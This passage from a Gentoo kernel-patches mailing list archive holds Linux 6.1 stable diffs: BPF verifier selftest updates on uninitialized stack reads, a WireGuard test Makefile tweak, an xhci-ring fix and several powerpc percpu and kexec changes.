+index a6c869a7319cd..9c4885885aba0 100644
+--- a/tools/testing/selftests/bpf/verifier/helper_access_var_len.c
++++ b/tools/testing/selftests/bpf/verifier/helper_access_var_len.c
+@@ -29,19 +29,30 @@
+ {
+ 	"helper access to variable memory: stack, bitwise AND, zero included",
+ 	.insns = {
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),
+-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -64),
+-	BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, -128),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, -128),
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 64),
+-	BPF_MOV64_IMM(BPF_REG_3, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_probe_read_kernel),
++	/* set max stack size */
++	BPF_ST_MEM(BPF_DW, BPF_REG_10, -128, 0),
++	/* set r3 to a random value */
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
++	/* use bitwise AND to limit r3 range to [0, 64] */
++	BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 64),
++	BPF_LD_MAP_FD(BPF_REG_1, 0),
++	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -64),
++	BPF_MOV64_IMM(BPF_REG_4, 0),
++	/* Call bpf_ringbuf_output(), it is one of a few helper functions with
++	 * ARG_CONST_SIZE_OR_ZERO parameter allowed in unpriv mode.
++	 * For unpriv this should signal an error, because memory at &fp[-64] is
++	 * not initialized.
++	 */
++	BPF_EMIT_CALL(BPF_FUNC_ringbuf_output),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid indirect read from stack R1 off -64+0 size 64",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.fixup_map_ringbuf = { 4 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -64+0 size 64",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"helper access to variable memory: stack, bitwise AND + JMP, wrong max",
+@@ -183,20 +194,31 @@
+ {
+ 	"helper access to variable memory: stack, JMP, no min check",
+ 	.insns = {
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),
+-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -64),
+-	BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, -128),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, -128),
+-	BPF_JMP_IMM(BPF_JGT, BPF_REG_2, 64, 3),
+-	BPF_MOV64_IMM(BPF_REG_3, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_probe_read_kernel),
++	/* set max stack size */
++	BPF_ST_MEM(BPF_DW, BPF_REG_10, -128, 0),
++	/* set r3 to a random value */
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
++	/* use JMP to limit r3 range to [0, 64] */
++	BPF_JMP_IMM(BPF_JGT, BPF_REG_3, 64, 6),
++	BPF_LD_MAP_FD(BPF_REG_1, 0),
++	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -64),
++	BPF_MOV64_IMM(BPF_REG_4, 0),
++	/* Call bpf_ringbuf_output(), it is one of a few helper functions with
++	 * ARG_CONST_SIZE_OR_ZERO parameter allowed in unpriv mode.
++	 * For unpriv this should signal an error, because memory at &fp[-64] is
++	 * not initialized.
++	 */
++	BPF_EMIT_CALL(BPF_FUNC_ringbuf_output),
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid indirect read from stack R1 off -64+0 size 64",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.fixup_map_ringbuf = { 4 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -64+0 size 64",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"helper access to variable memory: stack, JMP (signed), no min check",
+@@ -564,29 +586,41 @@
+ {
+ 	"helper access to variable memory: 8 bytes leak",
+ 	.insns = {
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),
+-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -64),
++	/* set max stack size */
++	BPF_ST_MEM(BPF_DW, BPF_REG_10, -128, 0),
++	/* set r3 to a random value */
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
++	BPF_LD_MAP_FD(BPF_REG_1, 0),
++	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -64),
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -64),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -56),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -48),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -40),
++	/* Note: fp[-32] left uninitialized */
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -24),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -8),
+-	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_2, -128),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, -128),
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 63),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),
+-	BPF_MOV64_IMM(BPF_REG_3, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_probe_read_kernel),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
++	/* Limit r3 range to [1, 64] */
++	BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 63),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 1),
++	BPF_MOV64_IMM(BPF_REG_4, 0),
++	/* Call bpf_ringbuf_output(), it is one of a few helper functions with
++	 * ARG_CONST_SIZE_OR_ZERO parameter allowed in unpriv mode.
++	 * For unpriv this should signal an error, because memory region [1, 64]
++	 * at &fp[-64] is not fully initialized.
++	 */
++	BPF_EMIT_CALL(BPF_FUNC_ringbuf_output),
++	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid indirect read from stack R1 off -64+32 size 64",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.fixup_map_ringbuf = { 3 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -64+32 size 64",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"helper access to variable memory: 8 bytes no leak (init memory)",
+diff --git a/tools/testing/selftests/bpf/verifier/int_ptr.c b/tools/testing/selftests/bpf/verifier/int_ptr.c
+index 070893fb29007..02d9e004260b3 100644
+--- a/tools/testing/selftests/bpf/verifier/int_ptr.c
++++ b/tools/testing/selftests/bpf/verifier/int_ptr.c
+@@ -54,12 +54,13 @@
+ 		/* bpf_strtoul() */
+ 		BPF_EMIT_CALL(BPF_FUNC_strtoul),
+ 
+-		BPF_MOV64_IMM(BPF_REG_0, 1),
++		BPF_MOV64_IMM(BPF_REG_0, 0),
+ 		BPF_EXIT_INSN(),
+ 	},
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_CGROUP_SYSCTL,
+-	.errstr = "invalid indirect read from stack R4 off -16+4 size 8",
++	.result_unpriv = REJECT,
++	.errstr_unpriv = "invalid indirect read from stack R4 off -16+4 size 8",
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"ARG_PTR_TO_LONG misaligned",
+diff --git a/tools/testing/selftests/bpf/verifier/search_pruning.c b/tools/testing/selftests/bpf/verifier/search_pruning.c
+index d63fd8991b03a..745d6b5842fd4 100644
+--- a/tools/testing/selftests/bpf/verifier/search_pruning.c
++++ b/tools/testing/selftests/bpf/verifier/search_pruning.c
+@@ -128,9 +128,10 @@
+ 		BPF_EXIT_INSN(),
+ 	},
+ 	.fixup_map_hash_8b = { 3 },
+-	.errstr = "invalid read from stack off -16+0 size 8",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.errstr_unpriv = "invalid read from stack off -16+0 size 8",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"precision tracking for u32 spill/fill",
+@@ -258,6 +259,8 @@
+ 	BPF_EXIT_INSN(),
+ 	},
+ 	.flags = BPF_F_TEST_STATE_FREQ,
+-	.errstr = "invalid read from stack off -8+1 size 8",
+-	.result = REJECT,
++	.errstr_unpriv = "invalid read from stack off -8+1 size 8",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+diff --git a/tools/testing/selftests/bpf/verifier/sock.c b/tools/testing/selftests/bpf/verifier/sock.c
+index d11d0b28be416..108dd3ee1edda 100644
+--- a/tools/testing/selftests/bpf/verifier/sock.c
++++ b/tools/testing/selftests/bpf/verifier/sock.c
+@@ -530,33 +530,6 @@
+ 	.prog_type = BPF_PROG_TYPE_SCHED_CLS,
+ 	.result = ACCEPT,
+ },
+-{
+-	"sk_storage_get(map, skb->sk, &stack_value, 1): partially init stack_value",
+-	.insns = {
+-	BPF_MOV64_IMM(BPF_REG_2, 0),
+-	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_2, -8),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_1, offsetof(struct __sk_buff, sk)),
+-	BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 2),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	BPF_EMIT_CALL(BPF_FUNC_sk_fullsock),
+-	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	BPF_MOV64_IMM(BPF_REG_4, 1),
+-	BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -8),
+-	BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
+-	BPF_LD_MAP_FD(BPF_REG_1, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_sk_storage_get),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	},
+-	.fixup_sk_storage_map = { 14 },
+-	.prog_type = BPF_PROG_TYPE_SCHED_CLS,
+-	.result = REJECT,
+-	.errstr = "invalid indirect read from stack",
+-},
+ {
+ 	"bpf_map_lookup_elem(smap, &key)",
+ 	.insns = {
+diff --git a/tools/testing/selftests/bpf/verifier/spill_fill.c b/tools/testing/selftests/bpf/verifier/spill_fill.c
+index e23f07175e1bf..53286a7b49aab 100644
+--- a/tools/testing/selftests/bpf/verifier/spill_fill.c
++++ b/tools/testing/selftests/bpf/verifier/spill_fill.c
+@@ -171,9 +171,10 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.result = REJECT,
+-	.errstr = "invalid read from stack off -4+0 size 4",
+-	.prog_type = BPF_PROG_TYPE_SCHED_CLS,
++	.result_unpriv = REJECT,
++	.errstr_unpriv = "invalid read from stack off -4+0 size 4",
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"Spill a u32 const scalar.  Refill as u16.  Offset to skb->data",
+diff --git a/tools/testing/selftests/bpf/verifier/var_off.c b/tools/testing/selftests/bpf/verifier/var_off.c
+index d37f512fad16e..b183e26c03f10 100644
+--- a/tools/testing/selftests/bpf/verifier/var_off.c
++++ b/tools/testing/selftests/bpf/verifier/var_off.c
+@@ -212,31 +212,6 @@
+ 	.result = REJECT,
+ 	.prog_type = BPF_PROG_TYPE_LWT_IN,
+ },
+-{
+-	"indirect variable-offset stack access, max_off+size > max_initialized",
+-	.insns = {
+-	/* Fill only the second from top 8 bytes of the stack. */
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, 0),
+-	/* Get an unknown value. */
+-	BPF_LDX_MEM(BPF_W, BPF_REG_2, BPF_REG_1, 0),
+-	/* Make it small and 4-byte aligned. */
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 4),
+-	BPF_ALU64_IMM(BPF_SUB, BPF_REG_2, 16),
+-	/* Add it to fp.  We now have either fp-12 or fp-16, but we don't know
+-	 * which. fp-12 size 8 is partially uninitialized stack.
+-	 */
+-	BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_10),
+-	/* Dereference it indirectly. */
+-	BPF_LD_MAP_FD(BPF_REG_1, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	},
+-	.fixup_map_hash_8b = { 5 },
+-	.errstr = "invalid indirect read from stack R2 var_off",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_LWT_IN,
+-},
+ {
+ 	"indirect variable-offset stack access, min_off < min_initialized",
+ 	.insns = {
+@@ -289,33 +264,6 @@
+ 	.result = ACCEPT,
+ 	.prog_type = BPF_PROG_TYPE_CGROUP_SKB,
+ },
+-{
+-	"indirect variable-offset stack access, uninitialized",
+-	.insns = {
+-	BPF_MOV64_IMM(BPF_REG_2, 6),
+-	BPF_MOV64_IMM(BPF_REG_3, 28),
+-	/* Fill the top 16 bytes of the stack. */
+-	BPF_ST_MEM(BPF_W, BPF_REG_10, -16, 0),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+-	/* Get an unknown value. */
+-	BPF_LDX_MEM(BPF_W, BPF_REG_4, BPF_REG_1, 0),
+-	/* Make it small and 4-byte aligned. */
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_4, 4),
+-	BPF_ALU64_IMM(BPF_SUB, BPF_REG_4, 16),
+-	/* Add it to fp.  We now have either fp-12 or fp-16, we don't know
+-	 * which, but either way it points to initialized stack.
+-	 */
+-	BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_10),
+-	BPF_MOV64_IMM(BPF_REG_5, 8),
+-	/* Dereference it indirectly. */
+-	BPF_EMIT_CALL(BPF_FUNC_getsockopt),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	},
+-	.errstr = "invalid indirect read from stack R4 var_off",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_SOCK_OPS,
+-},
+ {
+ 	"indirect variable-offset stack access, ok",
+ 	.insns = {
+diff --git a/tools/testing/selftests/wireguard/qemu/Makefile b/tools/testing/selftests/wireguard/qemu/Makefile
+index e95bd56b332f7..35856b11c1435 100644
+--- a/tools/testing/selftests/wireguard/qemu/Makefile
++++ b/tools/testing/selftests/wireguard/qemu/Makefile
+@@ -109,9 +109,9 @@ KERNEL_ARCH := x86_64
+ KERNEL_BZIMAGE := $(KERNEL_BUILD_PATH)/arch/x86/boot/bzImage
+ QEMU_VPORT_RESULT := virtio-serial-device
+ ifeq ($(HOST_ARCH),$(ARCH))
+-QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off -no-acpi
++QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off,acpi=off
+ else
+-QEMU_MACHINE := -cpu max -machine microvm -no-acpi
++QEMU_MACHINE := -cpu max -machine microvm,acpi=off
+ endif
+ else ifeq ($(ARCH),i686)
+ CHOST := i686-linux-musl
+@@ -120,9 +120,9 @@ KERNEL_ARCH := x86
+ KERNEL_BZIMAGE := $(KERNEL_BUILD_PATH)/arch/x86/boot/bzImage
+ QEMU_VPORT_RESULT := virtio-serial-device
+ ifeq ($(subst x86_64,i686,$(HOST_ARCH)),$(ARCH))
+-QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off -no-acpi
++QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off,acpi=off
+ else
+-QEMU_MACHINE := -cpu coreduo -machine microvm -no-acpi
++QEMU_MACHINE := -cpu coreduo -machine microvm,acpi=off
+ endif
+ else ifeq ($(ARCH),mips64)
+ CHOST := mips64-linux-musl


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-15 11:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-15 11:16 UTC (permalink / raw
  To: gentoo-commits

commit:     63cc1990b8eee9825a213c9b2d261c8d3ab78b90
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jul 15 11:16:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jul 15 11:16:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=63cc1990

Linux patch 6.1.99

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |  4 ++++
 1098_linux-6.1.99.patch | 37 +++++++++++++++++++++++++++++++++++++
 2 files changed, 41 insertions(+)

diff --git a/0000_README b/0000_README
index 67ef8e56..6e536b9a 100644
--- a/0000_README
+++ b/0000_README
@@ -435,6 +435,10 @@ Patch:  1097_linux-6.1.98.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.98
 
+Patch:  1098_linux-6.1.99.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.99
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1098_linux-6.1.99.patch b/1098_linux-6.1.99.patch
new file mode 100644
index 00000000..b548a275
--- /dev/null
+++ b/1098_linux-6.1.99.patch
@@ -0,0 +1,37 @@
+diff --git a/Makefile b/Makefile
+index c9a630cdb2ec2..c12da8fcb089b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 98
++SUBLEVEL = 99
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index be5b0ff2966fe..7549c430c4f01 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2631,17 +2631,16 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 			else
+ 				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
+ 							    EP_SOFT_RESET);
+-			break;
++			goto cleanup;
+ 		case COMP_RING_UNDERRUN:
+ 		case COMP_RING_OVERRUN:
+ 		case COMP_STOPPED_LENGTH_INVALID:
+-			break;
++			goto cleanup;
+ 		default:
+ 			xhci_err(xhci, "ERROR Transfer event for unknown stream ring slot %u ep %u\n",
+ 				 slot_id, ep_index);
+ 			goto err_out;
+ 		}
+-		return 0;
+ 	}
+ 
+ 	/* Count current td numbers if ep->skip is set */


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-11 11:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-11 11:49 UTC (permalink / raw
  To: gentoo-commits

commit:     36635be3a2dfb97f52a0c05f27c9fedcb70e08e3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 11 11:49:17 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 11 11:49:17 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=36635be3

Linux patch 6.1.98

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1097_linux-6.1.98.patch | 3629 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3633 insertions(+)

diff --git a/0000_README b/0000_README
index 13913ad0..67ef8e56 100644
--- a/0000_README
+++ b/0000_README
@@ -431,6 +431,10 @@ Patch:  1096_linux-6.1.97.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.97
 
+Patch:  1097_linux-6.1.98.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.98
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1097_linux-6.1.98.patch b/1097_linux-6.1.98.patch
new file mode 100644
index 00000000..ed79fc38
--- /dev/null
+++ b/1097_linux-6.1.98.patch
@@ -0,0 +1,3629 @@
+diff --git a/Makefile b/Makefile
+index c2148be2ba340..c9a630cdb2ec2 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 97
++SUBLEVEL = 98
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts b/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts
+index b276eb0810c70..0ab611e9fbb7c 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts
+@@ -290,7 +290,7 @@ vdd_gpu: DCDC_REG2 {
+ 				regulator-name = "vdd_gpu";
+ 				regulator-always-on;
+ 				regulator-boot-on;
+-				regulator-min-microvolt = <900000>;
++				regulator-min-microvolt = <500000>;
+ 				regulator-max-microvolt = <1350000>;
+ 				regulator-init-microvolt = <900000>;
+ 				regulator-ramp-delay = <6001>;
+diff --git a/arch/powerpc/include/asm/interrupt.h b/arch/powerpc/include/asm/interrupt.h
+index 6d8492b6e2b83..4999de47b4a38 100644
+--- a/arch/powerpc/include/asm/interrupt.h
++++ b/arch/powerpc/include/asm/interrupt.h
+@@ -355,6 +355,14 @@ static inline void interrupt_nmi_enter_prepare(struct pt_regs *regs, struct inte
+ 	if (IS_ENABLED(CONFIG_KASAN))
+ 		return;
+ 
++	/*
++	 * Likewise, do not use it in real mode if percpu first chunk is not
++	 * embedded. With CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK enabled there
++	 * are chances where percpu allocation can come from vmalloc area.
++	 */
++	if (percpu_first_chunk_is_paged)
++		return;
++
+ 	/* Otherwise, it should be safe to call it */
+ 	nmi_enter();
+ }
+@@ -370,6 +378,8 @@ static inline void interrupt_nmi_exit_prepare(struct pt_regs *regs, struct inter
+ 		// no nmi_exit for a pseries hash guest taking a real mode exception
+ 	} else if (IS_ENABLED(CONFIG_KASAN)) {
+ 		// no nmi_exit for KASAN in real mode
++	} else if (percpu_first_chunk_is_paged) {
++		// no nmi_exit if percpu first chunk is not embedded
+ 	} else {
+ 		nmi_exit();
+ 	}
+diff --git a/arch/powerpc/include/asm/io.h b/arch/powerpc/include/asm/io.h
+index 0e1745e5125b0..6d3ce049babdf 100644
+--- a/arch/powerpc/include/asm/io.h
++++ b/arch/powerpc/include/asm/io.h
+@@ -42,7 +42,7 @@ extern struct pci_dev *isa_bridge_pcidev;
+  * define properly based on the platform
+  */
+ #ifndef CONFIG_PCI
+-#define _IO_BASE	0
++#define _IO_BASE	POISON_POINTER_DELTA
+ #define _ISA_MEM_BASE	0
+ #define PCI_DRAM_OFFSET 0
+ #elif defined(CONFIG_PPC32)
+diff --git a/arch/powerpc/include/asm/percpu.h b/arch/powerpc/include/asm/percpu.h
+index 8e5b7d0b851c6..634970ce13c6b 100644
+--- a/arch/powerpc/include/asm/percpu.h
++++ b/arch/powerpc/include/asm/percpu.h
+@@ -15,6 +15,16 @@
+ #endif /* CONFIG_SMP */
+ #endif /* __powerpc64__ */
+ 
++#if defined(CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK) && defined(CONFIG_SMP)
++#include <linux/jump_label.h>
++DECLARE_STATIC_KEY_FALSE(__percpu_first_chunk_is_paged);
++
++#define percpu_first_chunk_is_paged	\
++		(static_key_enabled(&__percpu_first_chunk_is_paged.key))
++#else
++#define percpu_first_chunk_is_paged	false
++#endif /* CONFIG_PPC64 && CONFIG_SMP */
++
+ #include <asm-generic/percpu.h>
+ 
+ #include <asm/paca.h>
+diff --git a/arch/powerpc/kernel/setup_64.c b/arch/powerpc/kernel/setup_64.c
+index b2e0d3ce4261c..7662265f24337 100644
+--- a/arch/powerpc/kernel/setup_64.c
++++ b/arch/powerpc/kernel/setup_64.c
+@@ -834,6 +834,7 @@ static __init int pcpu_cpu_to_node(int cpu)
+ 
+ unsigned long __per_cpu_offset[NR_CPUS] __read_mostly;
+ EXPORT_SYMBOL(__per_cpu_offset);
++DEFINE_STATIC_KEY_FALSE(__percpu_first_chunk_is_paged);
+ 
+ void __init setup_per_cpu_areas(void)
+ {
+@@ -876,6 +877,7 @@ void __init setup_per_cpu_areas(void)
+ 	if (rc < 0)
+ 		panic("cannot initialize percpu area (err=%d)", rc);
+ 
++	static_key_enable(&__percpu_first_chunk_is_paged.key);
+ 	delta = (unsigned long)pcpu_base_addr - (unsigned long)__per_cpu_start;
+ 	for_each_possible_cpu(cpu) {
+                 __per_cpu_offset[cpu] = delta + pcpu_unit_offsets[cpu];
+diff --git a/arch/powerpc/kexec/core_64.c b/arch/powerpc/kexec/core_64.c
+index a79e28c91e2be..e465e44877376 100644
+--- a/arch/powerpc/kexec/core_64.c
++++ b/arch/powerpc/kexec/core_64.c
+@@ -26,6 +26,7 @@
+ #include <asm/paca.h>
+ #include <asm/mmu.h>
+ #include <asm/sections.h>	/* _end */
++#include <asm/setup.h>
+ #include <asm/smp.h>
+ #include <asm/hw_breakpoint.h>
+ #include <asm/svm.h>
+@@ -316,6 +317,16 @@ void default_machine_kexec(struct kimage *image)
+ 	if (!kdump_in_progress())
+ 		kexec_prepare_cpus();
+ 
++#ifdef CONFIG_PPC_PSERIES
++	/*
++	 * This must be done after other CPUs have shut down, otherwise they
++	 * could execute the 'scv' instruction, which is not supported with
++	 * reloc disabled (see configure_exceptions()).
++	 */
++	if (firmware_has_feature(FW_FEATURE_SET_MODE))
++		pseries_disable_reloc_on_exc();
++#endif
++
+ 	printk("kexec: Starting switchover sequence.\n");
+ 
+ 	/* switch to a staticly allocated stack.  Based on irq stack code.
+diff --git a/arch/powerpc/platforms/pseries/kexec.c b/arch/powerpc/platforms/pseries/kexec.c
+index 096d09ed89f67..431be156ca9bb 100644
+--- a/arch/powerpc/platforms/pseries/kexec.c
++++ b/arch/powerpc/platforms/pseries/kexec.c
+@@ -61,11 +61,3 @@ void pseries_kexec_cpu_down(int crash_shutdown, int secondary)
+ 	} else
+ 		xics_kexec_teardown_cpu(secondary);
+ }
+-
+-void pseries_machine_kexec(struct kimage *image)
+-{
+-	if (firmware_has_feature(FW_FEATURE_SET_MODE))
+-		pseries_disable_reloc_on_exc();
+-
+-	default_machine_kexec(image);
+-}
+diff --git a/arch/powerpc/platforms/pseries/pseries.h b/arch/powerpc/platforms/pseries/pseries.h
+index 1d75b7742ef00..3f9b51298aa34 100644
+--- a/arch/powerpc/platforms/pseries/pseries.h
++++ b/arch/powerpc/platforms/pseries/pseries.h
+@@ -38,7 +38,6 @@ static inline void smp_init_pseries(void) { }
+ #endif
+ 
+ extern void pseries_kexec_cpu_down(int crash_shutdown, int secondary);
+-void pseries_machine_kexec(struct kimage *image);
+ 
+ extern void pSeries_final_fixup(void);
+ 
+diff --git a/arch/powerpc/platforms/pseries/setup.c b/arch/powerpc/platforms/pseries/setup.c
+index a0701dbdb1348..df07726192000 100644
+--- a/arch/powerpc/platforms/pseries/setup.c
++++ b/arch/powerpc/platforms/pseries/setup.c
+@@ -1149,7 +1149,6 @@ define_machine(pseries) {
+ 	.machine_check_exception = pSeries_machine_check_exception,
+ 	.machine_check_log_err	= pSeries_machine_check_log_err,
+ #ifdef CONFIG_KEXEC_CORE
+-	.machine_kexec          = pseries_machine_kexec,
+ 	.kexec_cpu_down         = pseries_kexec_cpu_down,
+ #endif
+ #ifdef CONFIG_MEMORY_HOTPLUG
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index cd692f399cd18..72307168d38ac 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -1354,7 +1354,7 @@ static int cpu_cmd(void)
